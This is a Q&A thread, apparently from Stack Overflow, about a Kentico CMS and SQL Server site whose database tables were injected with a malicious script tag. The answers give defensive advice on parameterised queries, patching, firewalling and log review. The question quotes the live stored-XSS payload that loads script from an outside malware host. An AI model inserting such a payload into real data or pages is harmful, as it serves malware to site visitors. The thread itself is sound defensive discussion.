# How to protect by hacking my Asp.net site and my sql server?

Tags: sql, asp.net, sql-server

My site is created in Kentico CMS 5.5 and SQL server 2008. Its running successfully but now these days any one of hacker hack my site and after a long time i found that in many of tables hacker add

`></title><script src="http://lilupophilupop.com/sl.php"></script><!--`

line in before of ever varchar cell. Suppose i have user table in that case before username it adds this string, before user's email-ID it adds this same string. How i can prevent my sql server by using this hacking. And what is the reason behind this?

Answer (score 3, accepted):

> How i can prevent my sql server by using this hacking.

First, you need to find out *how* the hacker got the data into your database (SQL injection, weak account password, ...). *Then* you can take appropriate actions.

> And what is the reason behind this?

The hacker hopes that the varchar field is printed on a web page without being properly encoded first. If that happens, the user's browser will download and execute the script.

Comment: +1. Normally "protecting" th sql server makes no sense because IT SHOULD NOT BE REACHABLE FROM THE INTERNET TO START WITH. This is likely a SQL injection from a weak CMS. Kontact Kentiko, amaybe ou forgot to fix a known issue that they issued a fix for a year ago?

Comment: @Heinzi : I don't know that how hacker hack my site. please let me know how to check this???

Comment: @GauravAgrawal You don't need to know (and can often never find out) how a thief picked your lock, you just need to fit a better lock.

Comment: @GauravAgrawal: There's no simple answer to that, since there is a wide range of possibilities: It could be a security bug in your CMS, it could be a security bug in your code, it could be a security hole in your server configuration, it could be an unpatched bug in your server OS, etc. You might need to have a security expert who knows how to read logs have a look at your system.

Answer (score 1):

This looks like it could be an 'SQL Injection' attack probably aimed at sending your visitors to a malware of fraudlent site.

Unfortunatly as Kentico CMS is commercial software your options are limited. You won't have the source that you can tweak to prevent further attacks commint through the front end.

You may need to

- Review the security of your SQL server and ensure that the attacker didn't connect to it directly
- Update to the latest security patch for the CMS (if you pay for maintenance it's free)
- Get support from Kentico, they may have seen this before
- Clean up your data and remove the offending scripts

If none of that is sucessful you may be able to add triggers to the necessary tables in SQL to remove the scripts as they are inserted in the database.

Answer (score 0):

You need to follow the industry best practices : look at 
[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project](https://www.owasp.org/index.php/Category%3aOWASP_Top_Ten_Project)

For the top 10 Web application security risks.

Answer (score 0):

There are few things to keep in mind that save your database from hacking is given below:

- Always use parametrized `Sql`, pass all values to DB using parametrized query

  ```
  SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = @ID");
  ```

  Not

  ```
  SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = " + value + "");
  ```

  Similarly, use `INSERT`, `UPDATE`, and `DELETE` query, or use `STORED PROCEDURE` in same manner.
- Only set permission to your specific user
- You can on/off `ValidateRequest` in your page/web.config file as required.
- Set Validation both in client/server side so that only valid data will pass to DB
- User appropriate data type in your column other than using a common data type (say VARCHAR)

Thanks

Answer (score 0):

I agree with @Heinzi - you should make an effort to figure out the attack vector (how the baddie got into your application).  You've found text in your database, but how did it get there?  Directly via Sql Server or through the web server OR through Kentico?  As you go through this investigative process, make notes of where your security is weak, and firm it up as you go - you're essentially doing a security audit!  Doing these steps will lead you to [harden your servers](http://blog.tevora.com/enterprise-applications/10-steps-to-harden-windows-server-2008-2/) against most sort of attacks, hopefully preventing this sort of thing from happening to you again.

I don't know anything about your topology (how your servers are set up and connected to each other and the web), but we can make a start at investigating by looking into the windows log of the machine your sql server is installed on - look for logins happening at times that are questionable, look for odd user accounts, and examine your password and username security. Get more details of things to look into here:[Windows Intruder Detection Checklist](http://www.google.co.uk/url?sa=t&rct=j&q=examining%20windows%20security%20logs%20for%20intruder&source=web&cd=5&ved=0CFwQFjAE&url=http://www.cert.org/archive/pdf/WIDC.pdf&ei=z3rmTvO0KK_54QT87tT6BA&usg=AFQjCNFRzJwU6mBP_I6dQC-K9iM56r3RTw)

If that doesn't turn up anything, [look at the Sql server logs](http://www.mssqltips.com/sqlservertip/1476/reading-the-sql-server-log-files-using-tsql/), and review your username/password security AND the access to the sql server instance; eg: the sql server should only be accessible from machines that have an explicit reason - your web server, maybe a network admin box, etc - use Windows Firewall to make the access 'tight', so that the sql server instance doesn't just respond to any computer asking. - [Here's more details about how to secure sql server.](http://msdn.microsoft.com/en-us/library/bb283235.aspx)

Check the web.config on your webserver - is the sql server username and password there?  Check your ftp logs to see if anyone's tried to read it recently.

Kentico versions 5+ (and maybe earlier) come with the ability to log 'events'.  If you have event logging turned on, you should be able to see your templates being modified; go to `Site Manager > Administration > Event Log` and go back to the date when you first noticed it, and examine the entries for what user account was doing the modifications.

Or even better: if you have access to the db server, you can do a direct table query to get at this data: 
`SELECT TOP 1000 *
  FROM [CMS_EventLog]` Look again for entries that seem to happen at odd times from weird Ip addresses or usernames.

And again, it's better to restrict access to all 'sensitive' resources (the Database, Kentico cmsdesk and siteadmin) as best you can.  Windows Firewall is pretty great at doing this - tighten down Remote Desktop access, and close as many ports as you can to reduce your servers' exposed surface area.  Test your exposure using something as simple as [Shields Up! from Gibson Research](http://www.grc.com/x/ne.dll?rh1dkyd2) or the [Awesome Nmap security scanner tool](http://nmap.org/).

As an example, my web servers only publicly expose ports 80 and 443 (http and https), and maybe a random high port like 4456 for Ftp if it's needed.  I use Windows Firewall to restrict access to Remote Desktop to a handful of IP addresses.  The Sql servers have NO public ports, they are tuned to 'stealth' and not reply to any request from a non-authorized IP.

As an anecdotal example - when I put a server live, it has taken as little as 8 hours before bots start trying to log in via remote desktop (you can see thousands of failed attempts in the windows Event Log > security) - as soon as you use windows firewall to ignore non-approved IP addresses, the log stays clear.

As a helpful note: if you are not experienced doing this sort of thing, you may want to procure the services of an experienced Windows system administrator to help you.  And please realize that there may be more compromised systems - you may have just found the 'tip of the iceberg', there could be [Trojans](https://serverfault.com/questions/218005/my-servers-been-hacked-emergency) and Rootkits and other nasties waiting, so you'll need a full security scan too.